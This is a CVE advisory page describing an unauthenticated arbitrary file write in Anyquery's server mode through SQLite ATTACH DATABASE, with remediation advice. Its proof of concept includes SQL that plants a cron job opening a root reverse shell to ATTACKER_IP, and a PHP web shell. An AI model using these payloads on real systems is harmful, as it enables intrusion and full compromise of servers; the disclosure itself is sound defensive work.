Critical Alert 1 Active Exploit Detected Today

CVE-2008-4128 Cisco IOS Cross-Site Request Forgery Vulnerability →
Powered by CVE Watchtower
×

CVE Watchtower


← Back to CVE List

CVE-2026-50006NVD

Vulnerability Summary

## Summary
Anyquery's `server` mode does not disable or restrict native SQLite disk manipulation commands. Unauthenticated attackers connecting to the MySQL-compatible server port can use the `ATTACH DATABASE` command to write arbitrary SQLite databases to any path on the victim's filesystem where the process has write permissions. This leads to Arbitrary File Write (AFW) which could lead to Remote Code Execution (RCE) depending on the environment (e.g., by dropping a PHP web shell if a web server is running, or overwriting system cronjobs if running as root).

## Details
When Anyquery is launched in **Server Mode** (`anyquery server`), it blindly proxies incoming SQL commands to the underlying SQLite engine. SQLite allows dynamic database mounting via the `ATTACH DATABASE` command, which creates a physical `.db` file on the filesystem if the file does not exist.

An attacker can connect to the open Anyquery port, attach a new database to a sensitive path (e.g., `/var/www/html/shell.php`, `/etc/cron.d/pwn` or `/root/.ssh/authorized_keys`), create a table, and insert a malicious payload. Although the file will contain a binary SQLite header, standard Linux services like `cron`, `sshd`, and web servers like `PHP` tolerate garbage data and will parse/execute the valid payload lines injected by the attacker.

## PoC (Proof of Concept)
1. Start the server on the victim machine:
```bash
anyquery server --host 0.0.0.0 --port 8070
```
2. Connect from an attacker machine:
```bash
mysql -u root -h <VICTIM_IP> -P 8070
```
3. Execute the payload to write a malicious cronjob for native RCE (Note: the Anyquery process must have write permissions to the target directory, such as `/etc/cron.d` or `/var/spool/cron/crontabs/`):
```sql
ATTACH DATABASE '/etc/cron.d/pwn' AS pwn;
CREATE TABLE pwn.task (cmd TEXT);
INSERT INTO pwn.task VALUES ('* * * * * root /bin/bash -c "bash -i >& /dev/tcp/ATTACKER_IP/1337 0>&1"');
```

*Alternatively, if a web server is running and the Anyquery process can write to the web root, you can drop a PHP shell:*
```sql
ATTACH DATABASE '/var/www/html/shell.php' AS pwn;
CREATE TABLE pwn.hacked (cmd TEXT);
INSERT INTO pwn.hacked VALUES ('<?php system($_GET["cmd"]); ?>');
```

*If testing locally as a non-root user, you can verify the vulnerability by writing to `/tmp`:*
```sql
ATTACH DATABASE '/tmp/pwn.db' AS pwn;
CREATE TABLE pwn.test (cmd TEXT);
INSERT INTO pwn.test VALUES ('Hello Anyquery AFW');
```
Within 60 seconds, the system's cron daemon will ignore the SQLite header, parse the valid cron string, and execute the reverse shell payload with root privileges.

## Impact
- **Confidentiality:** None (from the write action itself, though combined with LFR it becomes High).
- **Integrity:** High. Arbitrary files can be written or overwritten, which corrupts the filesystem.
- **Availability:** High. Overwriting critical system files (e.g., configurations, databases) can lead to complete Denial of Service (DoS).
- **CVSS Score:** 9.1 (Critical) - `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H`
- *Note: If the process is running with elevated privileges (e.g., root) or inside a web root directory, this escalates to Remote Code Execution (RCE) with a CVSS of 9.8 (Critical).*

## Remediation
Disable dangerous SQLite functions (`ATTACH DATABASE`, `DETACH DATABASE`, etc.) when running in Server Mode. Restrict the MySQL handler so that it only permits operations on the main database or in-memory virtual tables.
Severity Level
CRITICAL(9.1)
Published Date
Jul 14, 2026
Last Modified
Jul 14, 2026
Exploitation Status
No confirmed exploitation yet
EPSS Score (30-Day)
Data Pending
Root Weakness (CWE)
N/A
CVSS v3.1 Base Metrics
Attack VectorNetwork
Attack ComplexityLow
Privileges RequiredNone
User InteractionNone
ScopeUnchanged
ConfidentialityNone
IntegrityHigh
AvailabilityHigh

External References